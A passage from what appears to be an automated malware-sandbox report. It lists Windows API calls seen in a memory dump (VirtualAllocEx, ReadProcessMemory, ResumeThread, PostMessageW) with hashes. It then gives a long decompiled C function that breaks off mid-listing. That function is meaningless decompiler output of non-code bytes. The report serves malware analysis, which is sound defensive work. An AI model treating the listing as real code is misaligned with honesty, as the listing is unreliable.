                        • Instruction ID: 8e2012080027a8506f56b700e8eca6ad6afe34e1da464c32a3a3794a1af54087
                        • Opcode Fuzzy Hash: 2825180ecdcae1f232a3b56510e9d1436d5006929d18cf5083799f1d21e699f2
                        • Instruction Fuzzy Hash: 981146B1D006898FDB10DFA9C4847EFFBF5AF98224F148829D415A7200C778A94ACBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DC8586
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 2883045ec0cc0fc86aa0ba01a763a0254a0e79e18c0808a48cc55b895f79c544
                        • Instruction ID: a6c774cb3be0923108d4cdab6bb82496d3fcc6d413749283d8cf69597d71d634
                        • Opcode Fuzzy Hash: 2883045ec0cc0fc86aa0ba01a763a0254a0e79e18c0808a48cc55b895f79c544
                        • Instruction Fuzzy Hash: 971167718002098FDF10DFA9C844BEFBBF5EF88314F148819E515A7200C775A955CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 04DCBDF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 3ae5c598a27418a1a09d51a0584823cfff00db18923b2e98403bacb3e667ee92
                        • Instruction ID: 8cdcc1000480a2ba52952ad482e035ac2e3debfa7a38a1a49a75d9efdb4d60b4
                        • Opcode Fuzzy Hash: 3ae5c598a27418a1a09d51a0584823cfff00db18923b2e98403bacb3e667ee92
                        • Instruction Fuzzy Hash: DE1143B5800749CFDB10CF9AD445BDEBBF4EF48324F14886AD965A7201C738A989CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 04DC83F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 14ed844319b28f0ab0eca251f4880bead227012232a605fed43ebd9c21fa50bf
                        • Instruction ID: 0408c8c9f699cb6e0bf8e368ddf4c27a4e6413e597d4324f1284233c58c36def
                        • Opcode Fuzzy Hash: 14ed844319b28f0ab0eca251f4880bead227012232a605fed43ebd9c21fa50bf
                        • Instruction Fuzzy Hash: 0F113671D006498FDB10DFAAC4447DFFBF9EF88228F148829D419A7340CB74A945CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DCAD3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 3833aac97a7bdda2701dff6c62d49d1233a7ab3254fe1c1584e5527e2b774c15
                        • Instruction ID: a91c6aca952cea4751f030cfb60e3960289cae4598864778d0d432ca24525fb9
                        • Opcode Fuzzy Hash: 3833aac97a7bdda2701dff6c62d49d1233a7ab3254fe1c1584e5527e2b774c15
                        • Instruction Fuzzy Hash: A5110FB1800749DFDB10CF99D884BDEBBF8EB58324F14881AE554A7200D374A984CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 04DCBDF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 53e3678a7833f34c780a7b4ca2ee5d7a2010a70e0194775f223dbe7239acbe2d
                        • Instruction ID: ecac0050ce852b1a9888f5abed60bdbe871c3008888b28005621fc843bc792b8
                        • Opcode Fuzzy Hash: 53e3678a7833f34c780a7b4ca2ee5d7a2010a70e0194775f223dbe7239acbe2d
                        • Instruction Fuzzy Hash: A11145B1800649CFDB10CF9AD445BDEBBF8EF48324F14882AD569A7340D338A949CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DCAD3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: b7f72d0fc51c0831c4fe0e9e086e47258950eaffc8b0a623fc4b75c0e89e7a56
                        • Instruction ID: cd6b28a01bb976e1698a9a1fa62e39e5fa7102b6a948285c8285ffa793d13999
                        • Opcode Fuzzy Hash: b7f72d0fc51c0831c4fe0e9e086e47258950eaffc8b0a623fc4b75c0e89e7a56
                        • Instruction Fuzzy Hash: C111D3B5800649DFDB10DF99D484BDEBBF8EB48324F148819D515A7300D374A945CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DC8748
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 91cc7e0c1c3df835c3212a109f66c95822aa4433d3d26997f97b6945b3021369
                        • Instruction ID: 3eb7e4f01d32966b97437ac19e584d8cc67df8a1696d9e3d969dfbc86a3cc47b
                        • Opcode Fuzzy Hash: 91cc7e0c1c3df835c3212a109f66c95822aa4433d3d26997f97b6945b3021369
                        • Instruction Fuzzy Hash: 1BF0CD32804209CFDF10DFA9C4047DEFBF1AF98328F10882AD05463291D778A859EB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: '
                        • API String ID: 0-1997036262
                        • Opcode ID: 667270483543de9a531deccc25865c5b4056d490977eef1fbea1be8173c3c5e0
                        • Instruction ID: cb92ebe3597b26c744424c856c5a3eac7719134fee6864603fc8e863f1c00df2
                        • Opcode Fuzzy Hash: 667270483543de9a531deccc25865c5b4056d490977eef1fbea1be8173c3c5e0
                        • Instruction Fuzzy Hash: 1F516FB1E016198BEB59CF6B8D4079AFAF7AFC9300F14C1FA851CAB255DB3059868F11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72020747c096972eeddaeb98491b065f6cd3be4980677cfaffbac025f0afa158
                        • Instruction ID: 2c890745a65d232f20af6923042aeb9072052e4f0ec4635762e497340d48a41a
                        • Opcode Fuzzy Hash: 72020747c096972eeddaeb98491b065f6cd3be4980677cfaffbac025f0afa158
                        • Instruction Fuzzy Hash: 5C22C372865D3EDBC7221F58C5C95D5B370FB6F300B648A58C98148427EF39A22BE395
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E00185375(intOrPtr* __eax, intOrPtr* __ebx, signed int __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
                        				intOrPtr* _t403;
                        				signed char _t404;
                        				signed char _t405;
                        				signed char _t406;
                        				signed char _t407;
                        				signed char _t408;
                        				signed char _t409;
                        				signed char _t410;
                        				signed char* _t412;
                        				signed int _t413;
                        				signed int _t414;
                        				signed int _t415;
                        				intOrPtr* _t416;
                        				intOrPtr* _t419;
                        				intOrPtr* _t420;
                        				intOrPtr* _t421;
                        				intOrPtr* _t422;
                        				signed int _t424;
                        				signed char _t425;
                        				intOrPtr* _t426;
                        				char* _t430;
                        				signed int _t431;
                        				void* _t432;
                        				intOrPtr* _t433;
                        				signed int* _t434;
                        				signed char _t436;
                        				signed char _t437;
                        				signed char _t438;
                        				intOrPtr* _t439;
                        				intOrPtr* _t441;
                        				signed int _t443;
                        				char* _t444;
                        				intOrPtr* _t446;
                        				intOrPtr* _t448;
                        				intOrPtr* _t450;
                        				intOrPtr* _t452;
                        				intOrPtr* _t454;
                        				intOrPtr* _t456;
                        				signed int _t457;
                        				signed char _t459;
                        				signed int _t460;
                        				void* _t462;
                        				signed char _t463;
                        				intOrPtr* _t465;
                        				intOrPtr* _t466;
                        				signed int _t467;
                        				signed int _t468;
                        				void* _t469;
                        				void* _t470;
                        				void* _t471;
                        				signed char _t472;
                        				signed char _t473;
                        				void* _t474;
                        				signed int _t475;
                        				intOrPtr* _t476;
                        				intOrPtr* _t477;
                        				intOrPtr* _t478;
                        				signed char _t480;
                        				intOrPtr* _t481;
                        				intOrPtr* _t482;
                        				intOrPtr* _t483;
                        				signed int _t485;
                        				signed int _t486;
                        				signed int _t487;
                        				signed char _t489;
                        				void* _t492;
                        				signed int _t495;
                        				signed char _t497;
                        				signed char _t498;
                        				intOrPtr* _t499;
                        				intOrPtr* _t500;
                        				void* _t501;
                        				void* _t504;
                        				signed char _t508;
                        				intOrPtr _t509;
                        				char _t510;
                        				char _t511;
                        				intOrPtr* _t512;
                        				intOrPtr* _t514;
                        				intOrPtr* _t515;
                        				signed int* _t516;
                        				void* _t517;
                        				intOrPtr* _t518;
                        				void* _t519;
                        				void* _t521;
                        				void* _t522;
                        				signed char _t524;
                        				signed int _t527;
                        				intOrPtr* _t528;
                        				void* _t529;
                        				char* _t531;
                        				intOrPtr* _t533;
                        				void* _t535;
                        				void* _t538;
                        				signed char _t541;
                        				signed int* _t544;
                        				intOrPtr* _t545;
                        				intOrPtr* _t546;
                        				char* _t547;
                        				intOrPtr* _t548;
                        				signed char _t550;
                        				intOrPtr* _t551;
                        				void* _t553;
                        				void* _t555;
                        				void* _t559;
                        				void* _t568;
                        				intOrPtr* _t575;
                        				signed char _t577;
                        				intOrPtr* _t578;
                        				void* _t579;
                        				intOrPtr* _t580;
                        				void* _t581;
                        				void* _t582;
                        				void* _t584;
                        				signed char _t585;
                        				intOrPtr* _t587;
                        				void* _t588;
                        				intOrPtr* _t590;
                        				void* _t593;
                        				intOrPtr* _t597;
                        				signed int _t598;
                        				signed int _t599;
                        				signed int _t600;
                        				intOrPtr* _t603;
                        				signed int* _t604;
                        				signed int* _t605;
                        				signed char _t606;
                        				intOrPtr* _t608;
                        				signed char _t609;
                        				signed int _t610;
                        				void* _t611;
                        				signed int* _t613;
                        				signed int* _t614;
                        				signed int* _t615;
                        				signed int* _t616;
                        				signed int* _t617;
                        				void* _t618;
                        				signed int _t619;
                        				signed int _t620;
                        				signed int _t621;
                        				void* _t623;
                        				void* _t628;
                        				void* _t629;
                        				void* _t631;
                        				void* _t633;
                        
                        				_t597 = __edi;
                        				_t499 = __ebx;
                        				 *(__edi + 0x64003002) =  *(__edi + 0x64003002) | __ecx;
                        				asm("das");
                        				 *__eax =  *__eax + __eax;
                        				 *__eax =  *__eax + __eax;
                        				_t527 =  *__eax;
                        				 *__eax = __ecx;
                        				_t575 =  *((intOrPtr*)(_t623 + _t527 * 2));
                        				 *((intOrPtr*)(__edi + _t611)) =  *((intOrPtr*)(__edi + _t611)) + __ebx;
                        				_t528 =  *__eax;
                        				 *__eax = _t527;
                        				asm("wait");
                        				asm("adc al, 0x4c");
                        				_t603 = __esi +  *__eax +  *_t528;
                        				_t403 = __eax + _t575;
                        				asm("das");
                        				 *_t403 =  *_t403 + _t403;
                        				 *_t403 =  *_t403 + _t403;
                        				_t404 =  *_t403;
                        				 *_t404 = _t403;
                        				if( *_t403 <= 0) {
                        					_push(es);
                        					 *_t575 =  *_t575 + _t575;
                        					 *_t603 =  *_t603 + _t528;
                        					 *_t404 =  *_t404 ^ _t404;
                        					 *_t404 =  *_t404 + _t404;
                        					 *((intOrPtr*)(_t603 + 0x6101d18)) =  *((intOrPtr*)(_t603 + 0x6101d18)) + _t404;
                        					 *_t575 =  *_t575 + _t575;
                        					 *_t404 =  *_t404 + __ebx;
                        					 *_t404 =  *_t404 ^ _t404;
                        				}
                        				 *_t404 =  *_t404 + _t404;
                        				 *((intOrPtr*)(_t528 - 0x28f62df8)) =  *((intOrPtr*)(_t528 - 0x28f62df8)) + _t404;
                        				 *_t575 =  *_t575 + _t603;
                        				 *((intOrPtr*)(_t404 + _t603)) =  *((intOrPtr*)(_t404 + _t603)) + _t499;
                        				 *_t404 =  *_t404 + _t404;
                        				 *_t404 =  *_t404 + _t404;
                        				 *_t404 =  *_t404 | 0x01d713c2;
                        				_t405 = _t404 ^  *_t404;
                        				asm("pushad");
                        				 *_t405 =  *_t405 ^ _t405;
                        				 *_t405 =  *_t405 + _t405;
                        				 *((intOrPtr*)(_t603 + 0x6101d18)) =  *((intOrPtr*)(_t603 + 0x6101d18)) + _t405;
                        				 *_t575 =  *_t575 + _t575;
                        				 *_t405 =  *_t405 + _t575;
                        				 *_t405 =  *_t405 ^ _t405;
                        				 *_t405 =  *_t405 + _t405;
                        				 *((intOrPtr*)(_t528 + 0x100e0c00)) =  *((intOrPtr*)(_t528 + 0x100e0c00)) + _t405;
                        				_push(es);
                        				_t406 = _t405 ^  *_t405;
                        				 *_t528 = _t575;
                        				 *_t406 =  *_t406 + _t406;
                        				 *_t406 =  *_t406 + _t406;
                        				 *_t406 =  *_t406 + 0x6160d12;
                        				_t407 = _t406 ^  *_t406;
                        				asm("pushfd");
                        				 *_t407 =  *_t407 ^ _t407;
                        				 *_t407 =  *_t407 + _t407;
                        				 *((intOrPtr*)(_t528 - 0x4eeb4800)) =  *((intOrPtr*)(_t528 - 0x4eeb4800)) + _t407;
                        				_t604 = _t603 +  *_t499;
                        				 *_t597 =  *_t597 + _t528;
                        				_t408 = _t407 ^  *_t407;
                        				 *_t408 =  *_t408 + _t408;
                        				 *((intOrPtr*)(_t528 + 0x220a8300)) =  *((intOrPtr*)(_t528 + 0x220a8300)) + _t408;
                        				 *_t408 =  *_t408 + _t408;
                        				 *((intOrPtr*)(_t528 + 0x220a7300)) =  *((intOrPtr*)(_t528 + 0x220a7300)) + _t408;
                        				_t577 = _t575 +  *0x321e00 +  *_t597;
                        				 *_t408 =  *_t408 + _t499;
                        				_t409 = _t408 ^  *_t408;
                        				 *_t409 =  *_t409 + _t409;
                        				 *((intOrPtr*)(_t528 + 0x10044b00)) =  *((intOrPtr*)(_t528 + 0x10044b00)) + _t409;
                        				 *_t528 =  *_t528 + _t499;
                        				 *((intOrPtr*)(_t604 + _t577)) =  *((intOrPtr*)(_t604 + _t577)) + _t528;
                        				 *_t409 =  *_t409 + 0x28f0425;
                        				asm("outsb");
                        				_t410 = _t409 ^ 0x00000000;
                        				 *_t410 =  *_t410 + _t410;
                        				 *((intOrPtr*)(_t528 + 0x60ac500)) =  *((intOrPtr*)(_t528 + 0x60ac500)) + _t410;
                        				 *_t577 =  *_t577 + _t499;
                        				 *((intOrPtr*)(_t410 + 0x34)) =  *((intOrPtr*)(_t410 + 0x34)) + _t410;
                        				 *((intOrPtr*)(_t528 + 0x1d08c400)) =  *((intOrPtr*)(_t528 + 0x1d08c400)) + _t410;
                        				_push(es);
                        				 *(_t410 + _t410) =  *(_t410 + _t410) << 1;
                        				 *_t410 =  *_t410 + _t410;
                        				_t500 = _t499 + _t499;
                        				_t412 =  &((_t410 + _t410)[0x3c0015]);
                        				 *0 =  *0 | _t577;
                        				 *_t412 =  *_t412 + 0x6250e99;
                        				 *_t412 =  &(_t412[ *_t412]);
                        				 *((intOrPtr*)(_t528 + 0x6145b00)) =  *((intOrPtr*)(_t528 + 0x6145b00)) + _t412;
                        				 *_t604 =  *_t604 + _t500;
                        				 *_t500 =  *_t500 + _t577;
                        				 *_t412 =  *_t412 + 0x2220064;
                        				 *[ds:edi] =  *[ds:edi] + _t500;
                        				 *_t412 =  *_t412 + 0x222010b;
                        				_t413 =  &(_t412[1]);
                        				 *((intOrPtr*)(_t611 + 0x3d)) =  *((intOrPtr*)(_t611 + 0x3d)) + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + 0x2220172;
                        				_t578 = _t577 + 1;
                        				 *((intOrPtr*)(_t413 + 0x3d)) =  *((intOrPtr*)(_t413 + 0x3d)) + _t578;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + 0x60017;
                        				_t529 = _t528 + _t578;
                        				 *_t413 =  *_t413 + 0x600f2;
                        				 *_t597 =  *_t597 + _t500;
                        				 *[ds:eax] =  *[ds:eax] + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 =  *_t413 + 0x62b0073;
                        				 *_t413 =  *_t413 + _t529;
                        				 *[ds:eax] =  *[ds:eax] + _t413;
                        				 *_t413 =  *_t413 + _t413;
                        				 *_t413 = _t529;
                        				_t414 = _t413 ^ 0x4401d702;
                        				 *((intOrPtr*)(_t414 + 0x3e)) =  *((intOrPtr*)(_t414 + 0x3e)) + _t414;
                        				 *_t414 =  *_t414 + _t414;
                        				 *_t414 =  *_t414 + _t414;
                        				_t531 =  *_t414;
                        				 *_t414 =  *_t413;
                        				 *_t531 =  *_t531 - 1;
                        				asm("xlatb");
                        				 *((intOrPtr*)(_t414 + _t414 + 0x58)) =  *((intOrPtr*)(_t414 + _t414 + 0x58)) + _t414;
                        				 *[ds:eax] =  *[ds:eax] + _t414;
                        				 *_t414 =  *_t414 + _t414;
                        				 *_t414 = _t531;
                        				asm("rcl dword [ecx], cl");
                        				 *_t604 =  *_t604 ^ _t414;
                        				 *((intOrPtr*)(_t604 + _t597)) =  *((intOrPtr*)(_t604 + _t597)) + _t500;
                        				_t533 =  *_t414;
                        				_push(_t597);
                        				_t415 = _t414 | 0x0044063c;
                        				asm("aam 0x3e");
                        				 *_t415 =  *_t415 + _t415;
                        				 *_t415 =  *_t415 + _t415;
                        				_t501 =  *_t415;
                        				 *_t415 = _t500;
                        				asm("sbb eax, 0x44032910");
                        				 *((intOrPtr*)(_t597 + _t597)) =  *((intOrPtr*)(_t597 + _t597)) + _t415;
                        				 *_t415 =  *_t415 + _t415;
                        				 *_t415 =  *_t415 + _t415;
                        				 *_t415 =  *_t415 + 0x60b32;
                        				_t605 =  &(_t604[0]);
                        				 *((intOrPtr*)(_t597 + _t597)) =  *((intOrPtr*)(_t597 + _t597)) + _t533;
                        				_t416 =  *_t415;
                        				 *_t416 = _t415;
                        				_t417 =  >=  ?  *_t605 : _t416;
                        				_t606 =  &(_t605[0]);
                        				_t418 = ( >=  ?  *_t605 : _t416) + _t501;
                        				_t419 = ( >=  ?  *_t605 : _t416) + _t501 + 1;
                        				 *_t419 =  *_t419 + _t419;
                        				 *_t419 =  *_t419 + _t419;
                        				_t420 =  *_t419;
                        				 *_t420 = _t419;
                        				_t628 = _t533;
                        				asm("clts");
                        				 *_t533 =  *_t533 + _t533;
                        				asm("adc [ecx], al");
                        				 *_t420 =  *_t420 + _t420;
                        				 *((intOrPtr*)(_t533 + 0x48133100)) =  *((intOrPtr*)(_t533 + 0x48133100)) + _t420;
                        				_push(es);
                        				 *_t420 =  *_t420 + _t578;
                        				_t535 = _t533 - 1 + 1;
                        				 *_t420 =  *_t420 + _t420;
                        				 *_t420 =  *_t420 + _t420;
                        				_t421 =  *_t420;
                        				 *_t421 = _t420;
                        				_t422 = _t421 + _t535;
                        				 *_t422 =  *_t422 + _t422;
                        				 *_t422 =  *_t422 + _t422;
                        				 *_t422 = _t535 + 1;
                        				_t424 = _t422 + 0x50065b;
                        				 *_t578 =  *_t578 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				 *((intOrPtr*)(_t606 + 0x3c0cf808)) =  *((intOrPtr*)(_t606 + 0x3c0cf808)) + _t424;
                        				_push(es);
                        				_push(_t424);
                        				 *_t424 =  *_t424 + _t501;
                        				_t579 = _t578 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 = _t501;
                        				asm("sbb eax, 0x50065f10");
                        				 *_t424 =  *_t424 + _t579;
                        				_t580 = _t579 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				_t538 =  *_t424;
                        				 *_t424 =  *_t422;
                        				 *((intOrPtr*)(_t424 + 0x42)) =  *((intOrPtr*)(_t424 + 0x42)) + _t538;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 = _t538;
                        				asm("rol dword [ecx], 0x1");
                        				 *_t580 =  *_t580 + _t580;
                        				_push(_t628);
                        				_t581 = _t580 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				asm("int 0x1");
                        				asm("xlatb");
                        				 *0x5201d701 =  *0x5201d701 + _t581;
                        				asm("insb");
                        				_t582 = _t581 + 1;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				_t541 =  *_t424;
                        				asm("rol dword [ecx], cl");
                        				 *_t424 =  *_t424 + _t424;
                        				_push(0x5201d701);
                        				 *((intOrPtr*)(_t606 + 0x42)) =  *((intOrPtr*)(_t606 + 0x42)) + _t582;
                        				 *_t424 =  *_t424 + _t424;
                        				 *_t424 =  *_t424 + _t424;
                        				_t504 =  *_t424;
                        				 *_t424 = 0x5201d701;
                        				asm("sbb eax, 0x54032910");
                        				 *((intOrPtr*)(_t424 + 0x42)) =  *((intOrPtr*)(_t424 + 0x42)) + _t582;
                        				 *((intOrPtr*)(_t606 + 0x67167508)) =  *((intOrPtr*)(_t606 + 0x67167508)) + _t582;
                        				_push(es);
                        				 *((intOrPtr*)(_t582 + _t424 * 2)) =  *((intOrPtr*)(_t582 + _t424 * 2)) + _t541;
                        				_t425 = _t606;
                        				 *(_t541 + 0x58066716) =  *(_t541 + 0x58066716) | _t425;
                        				_t426 = _t425 + _t541;
                        				 *_t426 =  *_t426 + _t426;
                        				 *_t426 =  *_t426 + _t426;
                        				_t608 = _t426;
                        				_t584 = es;
                        				_t430 = (_t424 | _t541 | 0x0000006f) + _t504;
                        				_t585 = _t584 + 1;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 = 0xfc;
                        				asm("adc [eax+0x1], ebx");
                        				_t629 = _t606;
                        				 *((intOrPtr*)(_t430 + 0x43)) =  *((intOrPtr*)(_t430 + 0x43)) + _t430;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 =  *_t430 + _t430;
                        				 *_t430 = 0x2d;
                        				_t431 = _t430 + 0xd7;
                        				 *0x4a064e15 =  *0x4a064e15 + 0x5201d701;
                        				 *_t431 =  *_t431 + _t431;
                        				 *((intOrPtr*)(_t608 + 0x3c0cf808)) =  *((intOrPtr*)(_t608 + 0x3c0cf808)) + _t431;
                        				_t613 = es;
                        				 *((intOrPtr*)(0x5201d701 + _t431 * 2)) =  *((intOrPtr*)(0x5201d701 + _t431 * 2)) + _t504;
                        				 *_t431 = _t541;
                        				_t432 = _t431 + 0x5d06780d;
                        				 *((intOrPtr*)(_t608 + 0x43)) =  *((intOrPtr*)(_t608 + 0x43)) + _t432;
                        				 *((intOrPtr*)(_t608 + 0x78101d18)) =  *((intOrPtr*)(_t608 + 0x78101d18)) + _t432;
                        				_t609 = es;
                        				 *((intOrPtr*)(_t597 + 0x43)) =  *((intOrPtr*)(_t597 + 0x43)) + _t585;
                        				 *((intOrPtr*)(_t609 + 0x78101d18)) =  *((intOrPtr*)(_t609 + 0x78101d18)) + _t432;
                        				_t598 = es;
                        				_t433 = _t432 + _t432;
                        				 *_t433 =  *_t433 + _t433;
                        				 *_t433 =  *_t433 + _t433;
                        				_t434 =  *_t431;
                        				_t544 = _t433 + _t585;
                        				 *_t544 =  *_t544 + _t585;
                        				_t436 =  &(_t434[0x18]) & _t434[0x18];
                        				 *_t436 =  *_t436 + _t436;
                        				 *0x5811F419 =  *((intOrPtr*)(0x5811f419)) + _t436;
                        				 *_t436 =  *_t436 + _t436;
                        				 *(_t436 + _t436) =  *(_t436 + _t436) & _t436;
                        				 *_t436 =  *_t436 + _t436;
                        				_t437 = _t504 + 0x00000001 |  *_t434;
                        				 *(_t598 + 0x60067e0e) =  *(_t598 + 0x60067e0e) | _t585;
                        				 *((intOrPtr*)(_t437 + 0x44)) =  *((intOrPtr*)(_t437 + 0x44)) + _t544;
                        				 *_t437 =  *_t437 + _t437;
                        				 *_t437 =  *_t437 + _t437;
                        				_t438 = _t436;
                        				_t508 = _t437;
                        				_t121 = 0x4a064e15 + _t438 + 0x600684;
                        				 *_t121 =  *(0x4a064e15 + _t438 + 0x600684) | _t585;
                        				if( *_t121 <= 0) {
                        					 *_t438 =  *_t438 + _t438;
                        					 *_t438 =  *_t438 + _t438;
                        					_t497 = _t508;
                        					_t524 = _t438;
                        					 *(_t497 + 0x60068a05) =  *(_t497 + 0x60068a05) | _t497;
                        					 *((intOrPtr*)(_t497 + 0x44)) =  *((intOrPtr*)(_t497 + 0x44)) + _t544;
                        					 *((intOrPtr*)(_t524 - 0x6efea5f8)) =  *((intOrPtr*)(_t524 - 0x6efea5f8)) + _t585;
                        					_push(es);
                        					asm("popad");
                        					 *((intOrPtr*)(_t497 + 0x44)) =  *((intOrPtr*)(_t497 + 0x44)) + _t524;
                        					 *((intOrPtr*)(_t524 - 0x6efc75f8)) =  *((intOrPtr*)(_t524 - 0x6efc75f8)) + _t585;
                        					_push(es);
                        					asm("popad");
                        					_t498 = _t544 + _t497;
                        					 *_t498 =  *_t498 + _t498;
                        					 *_t498 =  *_t498 + _t498;
                        					_t438 = _t609;
                        					_t609 = _t498;
                        					 *_t544 =  *_t544 | _t524;
                        					asm("adc al, 0x97");
                        					_push(es);
                        					asm("popad");
                        					_t629 = _t629 + 2;
                        					 *_t438 =  *_t438 + _t438;
                        					 *_t438 =  *_t438 + _t438;
                        					_t508 =  *_t438;
                        					 *_t438 = _t524 + _t524;
                        					asm("sbb eax, 0x61000610");
                        					 *_t438 =  *_t438 + _t544;
                        				}
                        				 *_t613 =  *_t613 | _t438;
                        				 *_t438 =  *_t438 + _t438;
                        				_t544[0x6040a46] = _t544[0x6040a46] + _t585;
                        				_t439 = _t438 + 0x61;
                        				 *_t609 =  *_t609 + _t508;
                        				_t614 =  &(_t613[0]);
                        				 *_t439 =  *_t439 + _t439;
                        				 *_t439 =  *_t439 + _t439;
                        				_t545 = _t439;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t441 =  &(_t544[0x18]);
                        				 *((intOrPtr*)(_t614 + _t508)) =  *((intOrPtr*)(_t614 + _t508)) + _t545;
                        				_t509 =  *_t441;
                        				 *_t441 = _t508;
                        				asm("sbb eax, 0x61000610");
                        				 *_t585 =  *_t585 + _t545;
                        				_t615 =  &(_t614[0]);
                        				 *_t441 =  *_t441 + _t441;
                        				 *_t441 =  *_t441 + _t441;
                        				 *_t441 =  *_t441 + 0xffffffac;
                        				 *((intOrPtr*)(_t609 + _t441 + 0x45310061)) =  *((intOrPtr*)(_t609 + _t441 + 0x45310061)) + _t509;
                        				 *_t441 =  *_t441 + _t441;
                        				 *_t441 =  *_t441 + _t441;
                        				_t546 = _t441;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t443 = _t545 + 0x61;
                        				 *((intOrPtr*)(_t509 + _t615)) =  *((intOrPtr*)(_t509 + _t615)) + _t546;
                        				_t510 =  *_t443;
                        				 *_t443 = _t509;
                        				asm("sbb eax, 0x61000610");
                        				 *0x45 =  *0x45 + _t510;
                        				 *((intOrPtr*)(_t510 - 0x5eff5400)) =  *((intOrPtr*)(_t510 - 0x5eff5400)) + _t443;
                        				_push(es);
                        				asm("popad");
                        				 *((intOrPtr*)(_t615 + _t443 * 2)) =  *((intOrPtr*)(_t615 + _t443 * 2)) + _t443;
                        				 *_t443 =  *_t443 + _t443;
                        				 *((intOrPtr*)(_t546 + 0x18102918)) =  *((intOrPtr*)(_t546 + 0x18102918)) + _t585;
                        				_t444 = _t443 + 0x61;
                        				 *((intOrPtr*)(_t510 + _t615)) =  *((intOrPtr*)(_t510 + _t615)) + _t546;
                        				_t511 =  *_t444;
                        				 *_t444 = _t510;
                        				asm("sbb eax, 0x61000610");
                        				 *((intOrPtr*)(_t444 + 0x45)) =  *((intOrPtr*)(_t444 + 0x45)) + _t585;
                        				 *_t444 =  *_t444 + _t444;
                        				 *_t444 =  *_t444 + _t444;
                        				 *_t444 =  *_t444 + 0xffffffac;
                        				 *((intOrPtr*)(_t609 + 0x57006106)) =  *((intOrPtr*)(_t609 + 0x57006106)) + _t444;
                        				_t616 =  &(_t615[0]);
                        				 *_t444 =  *_t444 + _t444;
                        				 *_t444 =  *_t444 + _t444;
                        				_t547 = _t444;
                        				asm("sbb [ecx], ch");
                        				asm("adc [eax], bl");
                        				_t446 = _t546 + 0x61;
                        				 *((intOrPtr*)(_t511 + _t616)) =  *((intOrPtr*)(_t511 + _t616)) + _t547;
                        				_t512 =  *_t446;
                        				 *_t446 = _t511;
                        				asm("sbb eax, 0x61000610");
